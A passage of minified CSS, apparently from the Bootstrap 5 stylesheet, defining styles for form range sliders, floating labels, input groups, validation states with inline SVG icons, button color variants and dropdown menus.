ease-in-out,box-shadow .15s ease-in-out;-webkit-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.form-range::-webkit-slider-thumb{-webkit-transition:none;transition:none}}.form-range::-webkit-slider-thumb:active{background-color:#b6d4fe}.form-range::-webkit-slider-runnable-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.form-range::-moz-range-thumb{width:1rem;height:1rem;background-color:#0d6efd;border:0;border-radius:1rem;-moz-transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;-moz-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.form-range::-moz-range-thumb{-moz-transition:none;transition:none}}.form-range::-moz-range-thumb:active{background-color:#b6d4fe}.form-range::-moz-range-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.form-range:disabled{pointer-events:none}.form-range:disabled::-webkit-slider-thumb{background-color:#adb5bd}.form-range:disabled::-moz-range-thumb{background-color:#adb5bd}.form-floating{position:relative}.form-floating>.form-control,.form-floating>.form-control-plaintext,.form-floating>.form-select{height:calc(3.5rem + 2px);line-height:1.25}.form-floating>label{position:absolute;top:0;left:0;width:100%;height:100%;padding:1rem .75rem;overflow:hidden;text-align:start;text-overflow:ellipsis;white-space:nowrap;pointer-events:none;border:1px solid transparent;transform-origin:0 0;transition:opacity .1s ease-in-out,transform .1s ease-in-out}@media (prefers-reduced-motion:reduce){.form-floating>label{transition:none}}.form-floating>.form-control,.form-floating>.form-control-plaintext{padding:1rem .75rem}.form-floating>.form-control-plaintext::-moz-placeholder,.form-floating>.form-control::-moz-placeholder{color:transparent}.form-floating>.form-control-plaintext::placeholder,.form-floating>.form-control::placeholder{color:transparent}.form-floating>.form-control-plaintext:not(:-moz-placeholder-shown),.form-floating>.form-control:not(:-moz-placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control-plaintext:focus,.form-floating>.form-control-plaintext:not(:placeholder-shown),.form-floating>.form-control:focus,.form-floating>.form-control:not(:placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control-plaintext:-webkit-autofill,.form-floating>.form-control:-webkit-autofill{padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-select{padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:not(:-moz-placeholder-shown)~label{opacity:.65;transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.form-control-plaintext~label,.form-floating>.form-control:focus~label,.form-floating>.form-control:not(:placeholder-shown)~label,.form-floating>.form-select~label{opacity:.65;transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.form-control:-webkit-autofill~label{opacity:.65;transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.form-control-plaintext~label{border-width:1px 0}.input-group{position:relative;display:flex;flex-wrap:wrap;align-items:stretch;width:100%}.input-group>.form-control,.input-group>.form-floating,.input-group>.form-select{position:relative;flex:1 1 auto;width:1%;min-width:0}.input-group>.form-control:focus,.input-group>.form-floating:focus-within,.input-group>.form-select:focus{z-index:5}.input-group .btn{position:relative;z-index:2}.input-group .btn:focus{z-index:5}.input-group-text{display:flex;align-items:center;padding:.375rem .75rem;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:center;white-space:nowrap;background-color:#e9ecef;border:1px solid #ced4da;border-radius:.375rem}.input-group-lg>.btn,.input-group-lg>.form-control,.input-group-lg>.form-select,.input-group-lg>.input-group-text{padding:.5rem 1rem;font-size:1.25rem;border-radius:.5rem}.input-group-sm>.btn,.input-group-sm>.form-control,.input-group-sm>.form-select,.input-group-sm>.input-group-text{padding:.25rem .5rem;font-size:.875rem;border-radius:.25rem}.input-group-lg>.form-select,.input-group-sm>.form-select{padding-right:3rem}.input-group:not(.has-validation)>.dropdown-toggle:nth-last-child(n+3),.input-group:not(.has-validation)>.form-floating:not(:last-child)>.form-control,.input-group:not(.has-validation)>.form-floating:not(:last-child)>.form-select,.input-group:not(.has-validation)>:not(:last-child):not(.dropdown-toggle):not(.dropdown-menu):not(.form-floating){border-top-right-radius:0;border-bottom-right-radius:0}.input-group.has-validation>.dropdown-toggle:nth-last-child(n+4),.input-group.has-validation>.form-floating:nth-last-child(n+3)>.form-control,.input-group.has-validation>.form-floating:nth-last-child(n+3)>.form-select,.input-group.has-validation>:nth-last-child(n+3):not(.dropdown-toggle):not(.dropdown-menu):not(.form-floating){border-top-right-radius:0;border-bottom-right-radius:0}.input-group>:not(:first-child):not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback){margin-left:-1px;border-top-left-radius:0;border-bottom-left-radius:0}.input-group>.form-floating:not(:first-child)>.form-control,.input-group>.form-floating:not(:first-child)>.form-select{border-top-left-radius:0;border-bottom-left-radius:0}.valid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#198754}.valid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;color:#fff;background-color:rgba(25,135,84,.9);border-radius:.375rem}.is-valid~.valid-feedback,.is-valid~.valid-tooltip,.was-validated :valid~.valid-feedback,.was-validated :valid~.valid-tooltip{display:block}.form-control.is-valid,.was-validated .form-control:valid{border-color:#198754;padding-right:calc(1.5em + .75rem);background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23198754' d='M2.3 6.73.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(.375em + .1875rem) center;background-size:calc(.75em + .375rem) calc(.75em + .375rem)}.form-control.is-valid:focus,.was-validated .form-control:valid:focus{border-color:#198754;box-shadow:0 0 0 .25rem rgba(25,135,84,.25)}.was-validated textarea.form-control:valid,textarea.form-control.is-valid{padding-right:calc(1.5em + .75rem);background-position:top calc(.375em + .1875rem) right calc(.375em + .1875rem)}.form-select.is-valid,.was-validated .form-select:valid{border-color:#198754}.form-select.is-valid:not([multiple]):not([size]),.form-select.is-valid:not([multiple])[size="1"],.was-validated .form-select:valid:not([multiple]):not([size]),.was-validated .form-select:valid:not([multiple])[size="1"]{padding-right:4.125rem;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16'%3e%3cpath fill='none' stroke='%23343a40' stroke-linecap='round' stroke-linejoin='round' stroke-width='2' d='m2 5 6 6 6-6'/%3e%3c/svg%3e"),url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23198754' d='M2.3 6.73.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");background-position:right .75rem center,center right 2.25rem;background-size:16px 12px,calc(.75em + .375rem) calc(.75em + .375rem)}.form-select.is-valid:focus,.was-validated .form-select:valid:focus{border-color:#198754;box-shadow:0 0 0 .25rem rgba(25,135,84,.25)}.form-control-color.is-valid,.was-validated .form-control-color:valid{width:calc(3rem + calc(1.5em + .75rem))}.form-check-input.is-valid,.was-validated .form-check-input:valid{border-color:#198754}.form-check-input.is-valid:checked,.was-validated .form-check-input:valid:checked{background-color:#198754}.form-check-input.is-valid:focus,.was-validated .form-check-input:valid:focus{box-shadow:0 0 0 .25rem rgba(25,135,84,.25)}.form-check-input.is-valid~.form-check-label,.was-validated .form-check-input:valid~.form-check-label{color:#198754}.form-check-inline .form-check-input~.valid-feedback{margin-left:.5em}.input-group>.form-control:not(:focus).is-valid,.input-group>.form-floating:not(:focus-within).is-valid,.input-group>.form-select:not(:focus).is-valid,.was-validated .input-group>.form-control:not(:focus):valid,.was-validated .input-group>.form-floating:not(:focus-within):valid,.was-validated .input-group>.form-select:not(:focus):valid{z-index:3}.invalid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#dc3545}.invalid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;color:#fff;background-color:rgba(220,53,69,.9);border-radius:.375rem}.is-invalid~.invalid-feedback,.is-invalid~.invalid-tooltip,.was-validated :invalid~.invalid-feedback,.was-validated :invalid~.invalid-tooltip{display:block}.form-control.is-invalid,.was-validated .form-control:invalid{border-color:#dc3545;padding-right:calc(1.5em + .75rem);background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 12 12' width='12' height='12' fill='none' stroke='%23dc3545'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(.375em + .1875rem) center;background-size:calc(.75em + .375rem) calc(.75em + .375rem)}.form-control.is-invalid:focus,.was-validated .form-control:invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .25rem rgba(220,53,69,.25)}.was-validated textarea.form-control:invalid,textarea.form-control.is-invalid{padding-right:calc(1.5em + .75rem);background-position:top calc(.375em + .1875rem) right calc(.375em + .1875rem)}.form-select.is-invalid,.was-validated .form-select:invalid{border-color:#dc3545}.form-select.is-invalid:not([multiple]):not([size]),.form-select.is-invalid:not([multiple])[size="1"],.was-validated .form-select:invalid:not([multiple]):not([size]),.was-validated .form-select:invalid:not([multiple])[size="1"]{padding-right:4.125rem;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16'%3e%3cpath fill='none' stroke='%23343a40' stroke-linecap='round' stroke-linejoin='round' stroke-width='2' d='m2 5 6 6 6-6'/%3e%3c/svg%3e"),url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 12 12' width='12' height='12' fill='none' stroke='%23dc3545'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e");background-position:right .75rem center,center right 2.25rem;background-size:16px 12px,calc(.75em + .375rem) calc(.75em + .375rem)}.form-select.is-invalid:focus,.was-validated .form-select:invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .25rem rgba(220,53,69,.25)}.form-control-color.is-invalid,.was-validated .form-control-color:invalid{width:calc(3rem + calc(1.5em + .75rem))}.form-check-input.is-invalid,.was-validated .form-check-input:invalid{border-color:#dc3545}.form-check-input.is-invalid:checked,.was-validated .form-check-input:invalid:checked{background-color:#dc3545}.form-check-input.is-invalid:focus,.was-validated .form-check-input:invalid:focus{box-shadow:0 0 0 .25rem rgba(220,53,69,.25)}.form-check-input.is-invalid~.form-check-label,.was-validated .form-check-input:invalid~.form-check-label{color:#dc3545}.form-check-inline .form-check-input~.invalid-feedback{margin-left:.5em}.input-group>.form-control:not(:focus).is-invalid,.input-group>.form-floating:not(:focus-within).is-invalid,.input-group>.form-select:not(:focus).is-invalid,.was-validated .input-group>.form-control:not(:focus):invalid,.was-validated .input-group>.form-floating:not(:focus-within):invalid,.was-validated .input-group>.form-select:not(:focus):invalid{z-index:4}.btn{--bs-btn-padding-x:0.75rem;--bs-btn-padding-y:0.375rem;--bs-btn-font-family: ;--bs-btn-font-size:1rem;--bs-btn-font-weight:400;--bs-btn-line-height:1.5;--bs-btn-color:#212529;--bs-btn-bg:transparent;--bs-btn-border-width:1px;--bs-btn-border-color:transparent;--bs-btn-border-radius:0.375rem;--bs-btn-hover-border-color:transparent;--bs-btn-box-shadow:inset 0 1px 0 rgba(255, 255, 255, 0.15),0 1px 1px rgba(0, 0, 0, 0.075);--bs-btn-disabled-opacity:0.65;--bs-btn-focus-box-shadow:0 0 0 0.25rem rgba(var(--bs-btn-focus-shadow-rgb), .5);display:inline-block;padding:var(--bs-btn-padding-y) var(--bs-btn-padding-x);font-family:var(--bs-btn-font-family);font-size:var(--bs-btn-font-size);font-weight:var(--bs-btn-font-weight);line-height:var(--bs-btn-line-height);color:var(--bs-btn-color);text-align:center;text-decoration:none;vertical-align:middle;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;user-select:none;border:var(--bs-btn-border-width) solid var(--bs-btn-border-color);border-radius:var(--bs-btn-border-radius);background-color:var(--bs-btn-bg);transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.btn{transition:none}}.btn:hover{color:var(--bs-btn-hover-color);background-color:var(--bs-btn-hover-bg);border-color:var(--bs-btn-hover-border-color)}.btn-check+.btn:hover{color:var(--bs-btn-color);background-color:var(--bs-btn-bg);border-color:var(--bs-btn-border-color)}.btn:focus-visible{color:var(--bs-btn-hover-color);background-color:var(--bs-btn-hover-bg);border-color:var(--bs-btn-hover-border-color);outline:0;box-shadow:var(--bs-btn-focus-box-shadow)}.btn-check:focus-visible+.btn{border-color:var(--bs-btn-hover-border-color);outline:0;box-shadow:var(--bs-btn-focus-box-shadow)}.btn-check:checked+.btn,.btn.active,.btn.show,.btn:first-child:active,:not(.btn-check)+.btn:active{color:var(--bs-btn-active-color);background-color:var(--bs-btn-active-bg);border-color:var(--bs-btn-active-border-color)}.btn-check:checked+.btn:focus-visible,.btn.active:focus-visible,.btn.show:focus-visible,.btn:first-child:active:focus-visible,:not(.btn-check)+.btn:active:focus-visible{box-shadow:var(--bs-btn-focus-box-shadow)}.btn.disabled,.btn:disabled,fieldset:disabled .btn{color:var(--bs-btn-disabled-color);pointer-events:none;background-color:var(--bs-btn-disabled-bg);border-color:var(--bs-btn-disabled-border-color);opacity:var(--bs-btn-disabled-opacity)}.btn-primary{--bs-btn-color:#fff;--bs-btn-bg:#0d6efd;--bs-btn-border-color:#0d6efd;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#0b5ed7;--bs-btn-hover-border-color:#0a58ca;--bs-btn-focus-shadow-rgb:49,132,253;--bs-btn-active-color:#fff;--bs-btn-active-bg:#0a58ca;--bs-btn-active-border-color:#0a53be;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#fff;--bs-btn-disabled-bg:#0d6efd;--bs-btn-disabled-border-color:#0d6efd}.btn-secondary{--bs-btn-color:#fff;--bs-btn-bg:#6c757d;--bs-btn-border-color:#6c757d;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#5c636a;--bs-btn-hover-border-color:#565e64;--bs-btn-focus-shadow-rgb:130,138,145;--bs-btn-active-color:#fff;--bs-btn-active-bg:#565e64;--bs-btn-active-border-color:#51585e;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#fff;--bs-btn-disabled-bg:#6c757d;--bs-btn-disabled-border-color:#6c757d}.btn-success{--bs-btn-color:#fff;--bs-btn-bg:#198754;--bs-btn-border-color:#198754;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#157347;--bs-btn-hover-border-color:#146c43;--bs-btn-focus-shadow-rgb:60,153,110;--bs-btn-active-color:#fff;--bs-btn-active-bg:#146c43;--bs-btn-active-border-color:#13653f;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#fff;--bs-btn-disabled-bg:#198754;--bs-btn-disabled-border-color:#198754}.btn-info{--bs-btn-color:#000;--bs-btn-bg:#0dcaf0;--bs-btn-border-color:#0dcaf0;--bs-btn-hover-color:#000;--bs-btn-hover-bg:#31d2f2;--bs-btn-hover-border-color:#25cff2;--bs-btn-focus-shadow-rgb:11,172,204;--bs-btn-active-color:#000;--bs-btn-active-bg:#3dd5f3;--bs-btn-active-border-color:#25cff2;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#000;--bs-btn-disabled-bg:#0dcaf0;--bs-btn-disabled-border-color:#0dcaf0}.btn-warning{--bs-btn-color:#000;--bs-btn-bg:#ffc107;--bs-btn-border-color:#ffc107;--bs-btn-hover-color:#000;--bs-btn-hover-bg:#ffca2c;--bs-btn-hover-border-color:#ffc720;--bs-btn-focus-shadow-rgb:217,164,6;--bs-btn-active-color:#000;--bs-btn-active-bg:#ffcd39;--bs-btn-active-border-color:#ffc720;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#000;--bs-btn-disabled-bg:#ffc107;--bs-btn-disabled-border-color:#ffc107}.btn-danger{--bs-btn-color:#fff;--bs-btn-bg:#dc3545;--bs-btn-border-color:#dc3545;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#bb2d3b;--bs-btn-hover-border-color:#b02a37;--bs-btn-focus-shadow-rgb:225,83,97;--bs-btn-active-color:#fff;--bs-btn-active-bg:#b02a37;--bs-btn-active-border-color:#a52834;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#fff;--bs-btn-disabled-bg:#dc3545;--bs-btn-disabled-border-color:#dc3545}.btn-light{--bs-btn-color:#000;--bs-btn-bg:#f8f9fa;--bs-btn-border-color:#f8f9fa;--bs-btn-hover-color:#000;--bs-btn-hover-bg:#d3d4d5;--bs-btn-hover-border-color:#c6c7c8;--bs-btn-focus-shadow-rgb:211,212,213;--bs-btn-active-color:#000;--bs-btn-active-bg:#c6c7c8;--bs-btn-active-border-color:#babbbc;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#000;--bs-btn-disabled-bg:#f8f9fa;--bs-btn-disabled-border-color:#f8f9fa}.btn-dark{--bs-btn-color:#fff;--bs-btn-bg:#212529;--bs-btn-border-color:#212529;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#424649;--bs-btn-hover-border-color:#373b3e;--bs-btn-focus-shadow-rgb:66,70,73;--bs-btn-active-color:#fff;--bs-btn-active-bg:#4d5154;--bs-btn-active-border-color:#373b3e;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#fff;--bs-btn-disabled-bg:#212529;--bs-btn-disabled-border-color:#212529}.btn-outline-primary{--bs-btn-color:#0d6efd;--bs-btn-border-color:#0d6efd;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#0d6efd;--bs-btn-hover-border-color:#0d6efd;--bs-btn-focus-shadow-rgb:13,110,253;--bs-btn-active-color:#fff;--bs-btn-active-bg:#0d6efd;--bs-btn-active-border-color:#0d6efd;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#0d6efd;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#0d6efd;--bs-gradient:none}.btn-outline-secondary{--bs-btn-color:#6c757d;--bs-btn-border-color:#6c757d;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#6c757d;--bs-btn-hover-border-color:#6c757d;--bs-btn-focus-shadow-rgb:108,117,125;--bs-btn-active-color:#fff;--bs-btn-active-bg:#6c757d;--bs-btn-active-border-color:#6c757d;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#6c757d;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#6c757d;--bs-gradient:none}.btn-outline-success{--bs-btn-color:#198754;--bs-btn-border-color:#198754;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#198754;--bs-btn-hover-border-color:#198754;--bs-btn-focus-shadow-rgb:25,135,84;--bs-btn-active-color:#fff;--bs-btn-active-bg:#198754;--bs-btn-active-border-color:#198754;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#198754;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#198754;--bs-gradient:none}.btn-outline-info{--bs-btn-color:#0dcaf0;--bs-btn-border-color:#0dcaf0;--bs-btn-hover-color:#000;--bs-btn-hover-bg:#0dcaf0;--bs-btn-hover-border-color:#0dcaf0;--bs-btn-focus-shadow-rgb:13,202,240;--bs-btn-active-color:#000;--bs-btn-active-bg:#0dcaf0;--bs-btn-active-border-color:#0dcaf0;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#0dcaf0;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#0dcaf0;--bs-gradient:none}.btn-outline-warning{--bs-btn-color:#ffc107;--bs-btn-border-color:#ffc107;--bs-btn-hover-color:#000;--bs-btn-hover-bg:#ffc107;--bs-btn-hover-border-color:#ffc107;--bs-btn-focus-shadow-rgb:255,193,7;--bs-btn-active-color:#000;--bs-btn-active-bg:#ffc107;--bs-btn-active-border-color:#ffc107;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#ffc107;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#ffc107;--bs-gradient:none}.btn-outline-danger{--bs-btn-color:#dc3545;--bs-btn-border-color:#dc3545;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#dc3545;--bs-btn-hover-border-color:#dc3545;--bs-btn-focus-shadow-rgb:220,53,69;--bs-btn-active-color:#fff;--bs-btn-active-bg:#dc3545;--bs-btn-active-border-color:#dc3545;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#dc3545;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#dc3545;--bs-gradient:none}.btn-outline-light{--bs-btn-color:#f8f9fa;--bs-btn-border-color:#f8f9fa;--bs-btn-hover-color:#000;--bs-btn-hover-bg:#f8f9fa;--bs-btn-hover-border-color:#f8f9fa;--bs-btn-focus-shadow-rgb:248,249,250;--bs-btn-active-color:#000;--bs-btn-active-bg:#f8f9fa;--bs-btn-active-border-color:#f8f9fa;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#f8f9fa;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#f8f9fa;--bs-gradient:none}.btn-outline-dark{--bs-btn-color:#212529;--bs-btn-border-color:#212529;--bs-btn-hover-color:#fff;--bs-btn-hover-bg:#212529;--bs-btn-hover-border-color:#212529;--bs-btn-focus-shadow-rgb:33,37,41;--bs-btn-active-color:#fff;--bs-btn-active-bg:#212529;--bs-btn-active-border-color:#212529;--bs-btn-active-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);--bs-btn-disabled-color:#212529;--bs-btn-disabled-bg:transparent;--bs-btn-disabled-border-color:#212529;--bs-gradient:none}.btn-link{--bs-btn-font-weight:400;--bs-btn-color:var(--bs-link-color);--bs-btn-bg:transparent;--bs-btn-border-color:transparent;--bs-btn-hover-color:var(--bs-link-hover-color);--bs-btn-hover-border-color:transparent;--bs-btn-active-color:var(--bs-link-hover-color);--bs-btn-active-border-color:transparent;--bs-btn-disabled-color:#6c757d;--bs-btn-disabled-border-color:transparent;--bs-btn-box-shadow:none;--bs-btn-focus-shadow-rgb:49,132,253;text-decoration:underline}.btn-link:focus-visible{color:var(--bs-btn-color)}.btn-link:hover{color:var(--bs-btn-hover-color)}.btn-group-lg>.btn,.btn-lg{--bs-btn-padding-y:0.5rem;--bs-btn-padding-x:1rem;--bs-btn-font-size:1.25rem;--bs-btn-border-radius:0.5rem}.btn-group-sm>.btn,.btn-sm{--bs-btn-padding-y:0.25rem;--bs-btn-padding-x:0.5rem;--bs-btn-font-size:0.875rem;--bs-btn-border-radius:0.25rem}.fade{transition:opacity .15s linear}@media (prefers-reduced-motion:reduce){.fade{transition:none}}.fade:not(.show){opacity:0}.collapse:not(.show){display:none}.collapsing{height:0;overflow:hidden;transition:height .35s ease}@media (prefers-reduced-motion:reduce){.collapsing{transition:none}}.collapsing.collapse-horizontal{width:0;height:auto;transition:width .35s ease}@media (prefers-reduced-motion:reduce){.collapsing.collapse-horizontal{transition:none}}.dropdown,.dropdown-center,.dropend,.dropstart,.dropup,.dropup-center{position:relative}.dropdown-toggle{white-space:nowrap}.dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:.3em solid;border-right:.3em solid transparent;border-bottom:0;border-left:.3em solid transparent}.dropdown-toggle:empty::after{margin-left:0}.dropdown-menu{--bs-dropdown-zindex:1000;--bs-dropdown-min-width:10rem;--bs-dropdown-padding-x:0;--bs-dropdown-padding-y:0.5rem;--bs-dropdown-spacer:0.125rem;--bs-dropdown-font-size:1rem;--bs-dropdown-color:#212529;--bs-dropdown-bg:#fff;--bs-dropdown-border-color:var(--bs-border-color-translucent);--bs-dropdown-border-radius:0.375rem;--bs-dropdown-border-width:1px;--bs-dropdown-inner-border-radius:calc(0.375rem - 1px);--bs-dropdown-divider-bg:var(--bs-border-color-translucent);--bs-dropdown-divider-margin-y:0.5rem;--bs-dropdown-box-shadow:0 0.5rem 1rem rgba(0, 0, 0, 0.15);--bs-dropdown-link-color:#212529;--bs-dropdown-link-hover-color:#1e2125;--bs-dropdown-link-hover-bg:#e9ecef;--bs-dropdown-link-active-color:#fff;--bs-dropdown-link-active-bg:#0d6efd;--bs-dropdown-link-disabled-color:#adb5bd;--bs-dropdown-item-padding-x:1rem;--bs-dropdown-item-padding-y:0.25rem;--bs-dropdown-header-color:#6c757d;--bs-dropdown-header-padding-x:1rem;--bs-dropdown-header-padding-y:0.5rem;position:absolute;z-index:var(--bs-dropdown-zindex);display:none;min-width:var(--bs-dropdown-min-width);padding:var(--bs-dropdown-padding-y) var(--bs-dropdown-padding-x);margin:0;font-size:var(--bs-dropdown-font-size);color:var(--bs-dropdown-color);text-align:left;list-style:none;background-color:var(--bs-dropdown-bg);background-clip:padding-box;border:var(--bs-dropdown-border-width) solid var(--bs-dropdown-border-color);border-radius:var(--bs-dropdown-border-radius)}.dropdown-menu[data-bs-popper]{top:100%;left:0;margin-top:var(--bs-dropdown-spacer)}.dropdown-menu-start{--bs-position:start}.dropdown-menu-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-end{--bs-position:end}.dropdown-menu-end[data-bs-popper]{right:0;left:auto}@media (min-width:576px){.dropdown-menu-sm-start{--bs-position:start}.dropdown-menu-sm-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-sm-end{--bs-position:end}.dropdown-menu-sm-end[data-bs-popper]{right:0;left:auto}}@media (min-width:768px){.dropdown-menu-md-start{--bs-position:start}.dropdown-menu-md-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-md-end{--bs-position:end}.dropdown-menu-md-end[data-bs-popper]{right:0;left:auto}}@media (min-width:992px){.dropdown-menu-lg-start{--bs-position:start}.dropdown-menu-lg-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-lg-end{--bs-position:end}.dropdown-menu-lg-end[data-bs-popper]{right:0;left:auto}}@media (min-width:1200px){.dropdown-menu-xl-start{--bs-position:start}.dropdown-menu-xl-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-xl-end{--bs-position:end}.dropdown-menu-xl-end[data-bs-popper]{right:0;left:auto}}@media (min-width:1400px){.dropdown-menu-xxl-start{--bs-position:start}.dropdown-menu-xxl-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-xxl-end{--bs-position:end}.dropdown-menu-xxl-end[data-bs-popper]{right:0;left:auto}}.dropup .dropdown-menu[data-bs-popper]{top:auto;bottom:100%;margin-top:0;margin-bottom:var(--bs-dropdown-spacer)}.dropup .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:0;border-right:.3em solid transparent;border-bottom:.3em solid;border-left:.3em solid transparent}.dropup .dropdown-toggle:empty::after{margin-left:0}.dropend .dropdown-menu[data-bs-popper]{top:0;right:auto;left:100%;margin-top:0;margin-left:var(--bs-dropdown-spacer)}.dropend .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:.3em solid transparent;border-right:0;border-bottom:.3em solid transparent;border-left:.3em solid}.dropend .dropdown-toggle:empty::after{margin-left:0}.dropend .dropdown-toggle::after{vertical-align:0}.dropstart .dropdown-menu[data-bs-popper]{top:0;right:100%;left:auto;margin-top:0;margin-right:var(--bs-dropdown-spacer)}.dropstart .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:""}.dropstart .dropdown-toggle::after{display:none}.dropstart .dropdown-toggle::before{display:inline-block;margin-right:.255em;vertical-align:.255em;content:"";border-top:.3em solid transparent;border-right:.3em solid;border-bottom:.3em solid transparent}.dropstart .dropdown-toggle:empty::after{margin-left:0}.dropstart .dropdown-toggle::before{vertical-align:0}.dropdown-divider{height:0;margin:var(--bs-dropdown-divider-margin-y) 0;overflow:hidden;border-top:1px solid var(--bs-dropdown-divider-bg);opacity:1}.dropdown-item{display:block;width:100%;padding:var(--bs-dropdown-item-padding-y) 